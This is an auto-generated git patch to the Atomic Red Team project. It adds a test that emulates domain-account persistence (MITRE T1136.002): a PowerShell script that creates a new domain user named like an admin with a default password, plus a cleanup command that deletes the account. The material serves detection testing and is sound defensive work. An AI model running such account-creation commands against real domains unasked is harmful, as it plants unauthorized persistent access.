From 43bda07d491ab8579fbe95a85cdb0c65bad59df3 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 11 Feb 2021 17:19:00 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 37 ++++++++++++++ atomics/T1136.002/T1136.002.md | 48 +++++++++++++++++++ 6 files changed, 89 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 99e74211..587975b9 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -125,6 +125,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt +persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index cc4d262a..036c16ce 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -348,6 +348,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt +persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 1d2baaf6..a5b8b9cf 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -249,6 +249,7 @@ - [T1136.002 Domain Account](../../T1136.002/T1136.002.md) - Atomic Test #1: Create a new Windows domain admin user [windows] - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] + - Atomic Test #3: Create a new Domain Account using PowerShell [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.014 Emond](../../T1546.014/T1546.014.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e790f09c..de725c5f 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -630,6 +630,7 @@ - [T1136.002 Domain Account](../../T1136.002/T1136.002.md) - Atomic Test #1: Create a new Windows domain admin user [windows] - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] + - Atomic Test #3: Create a new Domain Account using PowerShell [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e79f7cb0..acdfb3e2 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -11752,6 +11752,43 @@ persistence: ' name: command_prompt elevation_required: false + - name: Create a new Domain Account using PowerShell + auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 + description: 'Creates a new Domain User using the credentials of the Current + User + +' + supported_platforms: + - windows + input_arguments: + username: + description: Name of the Account to be created + type: String + default: T1136.002_Admin + password: + description: Password of the Account to be created + type: String + default: T1136_pass123! + executor: + command: | + $SamAccountName = '#{username}' + $AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force + Add-Type -AssemblyName System.DirectoryServices.AccountManagement + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) + $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context) + $User.SamAccountName = $SamAccountName + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + $User.Enabled = $True + $User.PasswordNotRequired = $False + $User.DisplayName = $SamAccountName + $User.Save() + $User + cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain + +' + name: powershell + elevation_required: false T1078.002: technique: external_references: diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md index c3029be0..cf70f9c5 100644 --- a/atomics/T1136.002/T1136.002.md +++ b/atomics/T1136.002/T1136.002.md @@ -10,6 +10,8 @@ Such accounts may be used to establish secondary credentialed access that do not - [Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON](#atomic-test-2---create-a-new-account-similar-to-anonymous-logon) +- [Atomic Test #3 - Create a new Domain Account using PowerShell](#atomic-test-3---create-a-new-domain-account-using-powershell) +
@@ -80,4 +82,50 @@ net user "#{username}" >nul 2>&1 /del /domain +
+
+ +## Atomic Test #3 - Create a new Domain Account using PowerShell +Creates a new Domain User using the credentials of the Current User + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Name of the Account to be created | String | T1136.002_Admin| +| password | Password of the Account to be created | String | T1136_pass123!| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$SamAccountName = '#{username}' +$AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force +Add-Type -AssemblyName System.DirectoryServices.AccountManagement +$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) +$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context) +$User.SamAccountName = $SamAccountName +$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) +$User.SetPassword($TempCred.GetNetworkCredential().Password) +$User.Enabled = $True +$User.PasswordNotRequired = $False +$User.DisplayName = $SamAccountName +$User.Save() +$User +``` + +#### Cleanup Commands: +```powershell +net user "#{username}" >nul 2>&1 /del /domain +``` + + + + +